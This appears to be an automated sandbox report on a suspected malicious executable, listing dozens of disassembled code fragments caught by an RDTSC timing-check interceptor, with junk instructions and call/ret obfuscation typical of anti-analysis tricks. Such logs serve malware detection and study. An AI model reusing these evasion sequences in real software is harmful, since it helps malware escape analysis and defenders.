                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C55CF second address: 6C5614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB284h 0x00000008 jmp 00007FBF78ADB283h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007FBF78ADB27Ah 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b js 00007FBF78ADB27Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5614 second address: 6C5677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jl 00007FBF78E7B359h 0x0000000c and bh, FFFFFFA5h 0x0000000f jmp 00007FBF78E7B369h 0x00000014 push 00000000h 0x00000016 movsx ebx, bx 0x00000019 adc di, 0B1Eh 0x0000001e push 00000000h 0x00000020 movzx ebx, dx 0x00000023 mov bh, ah 0x00000025 xchg eax, esi 0x00000026 jng 00007FBF78E7B362h 0x0000002c jno 00007FBF78E7B35Ch 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FBF78E7B364h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5677 second address: 6C5685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78ADB27Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C761D second address: 6C7654 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c add dword ptr [ebp+122D33B4h], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FBF78E7B358h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push esi 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C7654 second address: 6C7671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF78ADB283h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8707 second address: 6C870B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C870B second address: 6C8711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8711 second address: 6C8717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE7E7 second address: 6CE899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007FBF78ADB286h 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FBF78ADB278h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 and bl, FFFFFF8Eh 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 or dword ptr [ebp+122D30F8h], ebx 0x0000003d mov bx, dx 0x00000040 popad 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007FBF78ADB278h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d mov ebx, 596801C5h 0x00000062 xchg eax, esi 0x00000063 jo 00007FBF78ADB297h 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FBF78ADB289h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF7A5 second address: 6CF7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBF78E7B356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CA919 second address: 6CA944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF78ADB286h 0x0000000a popad 0x0000000b push eax 0x0000000c jo 00007FBF78ADB284h 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FBF78ADB276h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CB96C second address: 6CB97E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78E7B358h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CD980 second address: 6CD986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C985E second address: 6C9886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007FBF78E7B365h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 js 00007FBF78E7B356h 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D08F2 second address: 6D08F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C9886 second address: 6C989F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78E7B365h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D08F6 second address: 6D08FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D08FC second address: 6D0906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF78E7B356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CDA39 second address: 6CDA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C989F second address: 6C990F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a jmp 00007FBF78E7B35Ah 0x0000000f pop edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 sbb di, 15EFh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007FBF78E7B358h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d clc 0x0000003e mov eax, dword ptr [ebp+122D1171h] 0x00000044 jbe 00007FBF78E7B35Ch 0x0000004a mov edi, dword ptr [ebp+122D554Eh] 0x00000050 push FFFFFFFFh 0x00000052 mov edi, ecx 0x00000054 nop 0x00000055 js 00007FBF78E7B364h 0x0000005b pushad 0x0000005c jl 00007FBF78E7B356h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CDA3D second address: 6CDA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C990F second address: 6C9921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF78E7B35Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CDA41 second address: 6CDA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CDA4D second address: 6CDA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D0B05 second address: 6D0B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D0B09 second address: 6D0B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D0B0D second address: 6D0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FBF78ADB27Ah 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D5286 second address: 6D5295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FBF78E7B356h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D89BE second address: 6D89CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007FBF78ADB276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D89CA second address: 6D89D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF78E7B373h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DC104 second address: 6DC108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DC108 second address: 6DC11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF78E7B35Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DB9FE second address: 6DBA21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DBA21 second address: 6DBA25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DBA25 second address: 6DBA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB284h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DBA3F second address: 6DBA5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF78E7B35Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF78E7B35Ah 0x0000000f jnc 00007FBF78E7B356h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E0C12 second address: 6E0C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FBF78ADB27Ch 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 js 00007FBF78ADB289h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBF78ADB27Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E0C6D second address: 6E0C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E0C73 second address: 6E0C8E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnl 00007FBF78ADB280h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4BA1 second address: 6E4BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4E48 second address: 6E4E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4E4E second address: 6E4E7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f jmp 00007FBF78E7B363h 0x00000014 jl 00007FBF78E7B35Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4FE5 second address: 6E4FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4FE9 second address: 6E4FEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4FEF second address: 6E4FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E516D second address: 6E5186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007FBF78E7B356h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jng 00007FBF78E7B356h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E530A second address: 6E5326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FBF78ADB282h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E549B second address: 6E54A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E54A2 second address: 6E54BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB287h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E54BF second address: 6E54CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jnl 00007FBF78E7B356h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BDDB4 second address: 6BDDC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BDDC2 second address: 6BDDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BDDC7 second address: 6BDDD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB27Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BDDD8 second address: 69BED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov eax, dword ptr [ebp+122D3546h] 0x0000000f sub dword ptr [ebp+124570F6h], ebx 0x00000015 popad 0x00000016 call dword ptr [ebp+122D27FFh] 0x0000001c pushad 0x0000001d jmp 00007FBF78E7B360h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 jc 00007FBF78E7B356h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE413 second address: 6BE428 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE428 second address: 6BE46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FBF78E7B358h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 ja 00007FBF78E7B357h 0x0000002a push ABA60B8Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 jno 00007FBF78E7B35Ch 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE46F second address: 6BE474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE71A second address: 6BE726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE726 second address: 6BE72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE72E second address: 6BE75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jns 00007FBF78E7B35Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jns 00007FBF78E7B356h 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE75F second address: 6BE765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE765 second address: 6BE769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BE9E5 second address: 6BEA74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FBF78ADB278h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007FBF78ADB288h 0x0000002c push edx 0x0000002d jmp 00007FBF78ADB283h 0x00000032 pop edi 0x00000033 popad 0x00000034 push 00000004h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FBF78ADB278h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D30F8h], edi 0x00000056 nop 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push esi 0x0000005b pop esi 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BEA74 second address: 6BEA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BEA78 second address: 6BEA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF78ADB281h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BEA91 second address: 6BEAAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FBF78E7B356h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BEE16 second address: 6BEE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BEE1A second address: 6BEE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FBF78E7B358h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push 0000001Eh 0x00000024 cmc 0x00000025 nop 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c popad 0x0000002d jne 00007FBF78E7B358h 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jmp 00007FBF78E7B369h 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BEE7E second address: 6BEE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BEE82 second address: 6BEE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF123 second address: 6BF12D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF12D second address: 6BF132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF132 second address: 6BF15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB289h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FBF78ADB276h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF15F second address: 6BF163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF163 second address: 6BF171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF171 second address: 6BF175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF175 second address: 6BF17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF17F second address: 6BF183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF183 second address: 6BF198 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FBF78ADB278h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
